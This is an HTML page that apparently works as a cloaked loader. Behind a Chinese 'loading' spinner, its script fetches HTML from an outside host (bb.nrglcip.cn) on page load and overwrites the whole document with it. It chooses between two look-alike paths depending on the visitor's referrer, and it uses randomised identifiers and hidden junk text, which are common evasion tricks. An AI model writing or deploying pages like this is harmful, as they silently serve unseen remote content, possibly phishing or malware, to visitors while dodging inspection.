<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TiSn0AXQoD {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TiSn0AXQoD .r9A59hNpX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TiSn0AXQoD .content {
            line-height: 50px;
            text-align: center
        }

        .TiSn0AXQoD .img {
            width: 100%
        }

        .TiSn0AXQoD .Tmewr8jcUf {
            text-align: center
        }

        .TiSn0AXQoD .Tmewr8jcUf span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TiSn0AXQoD .Tmewr8jcUf span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TiSn0AXQoD .Tmewr8jcUf span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TiSn0AXQoD .Tmewr8jcUf span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TiSn0AXQoD .Tmewr8jcUf span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TiSn0AXQoD .Tmewr8jcUf span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TiSn0AXQoD .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZhCPuRrDN1(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var O6oTv = ZhCPuRrDN1('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ O6oTv +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ O6oTv +".html?a=share";
		}
		
        jov4ZQ=url+"#"+new Date().getTime();
        jov4ZQ && function() {
            $.get(jov4ZQ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >MhALnkHnK6j4gJkL4fB0S7iWvQ102EaiX27uhvEWvCKCTJKtC66fMcObOUM1LCPidenFNuacU79</h1>
<span style='display:none'>rYdDsaHZ0d9iNzPsqKNJIqdfZvMd</span>
<img  src='' style='display:none'>
<span style='display:none'>rYdDsaHZ0d9iNzPsqKNJIqdfZvMd</span><div class="TiSn0AXQoD">
    <div class="r9A59hNpX">
        <div class="Tmewr8jcUf">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>aJAgqiRZALwNDNulJTSpsHLNt9upxYEEGaLnd7DOWylqmiGiYKUE</p>
<img  src='' style='display:none'>
<ul style='display:none' >maEFTUkjC8E6I6MakLVKGZD9TZ4OfZOnEtRwdnao6mcVX6bkGdrD6jMmfIVXr9cQJ0j</ul>
<ul style='display:none' >maEFTUkjC8E6I6MakLVKGZD9TZ4OfZOnEtRwdnao6mcVX6bkGdrD6jMmfIVXr9cQJ0j</ul>
<b style='display:none' >rC1qnHgIWdSr1X5ezSAP2PexTtUkXdbDo7MDdMIzDl7losLH44rQbQB4zxYSLl7qjIcMOEMCy6RLfDdPJlbfM35fdE</b>
<b style='display:none' >rC1qnHgIWdSr1X5ezSAP2PexTtUkXdbDo7MDdMIzDl7losLH44rQbQB4zxYSLl7qjIcMOEMCy6RLfDdPJlbfM35fdE</b></body>
</html>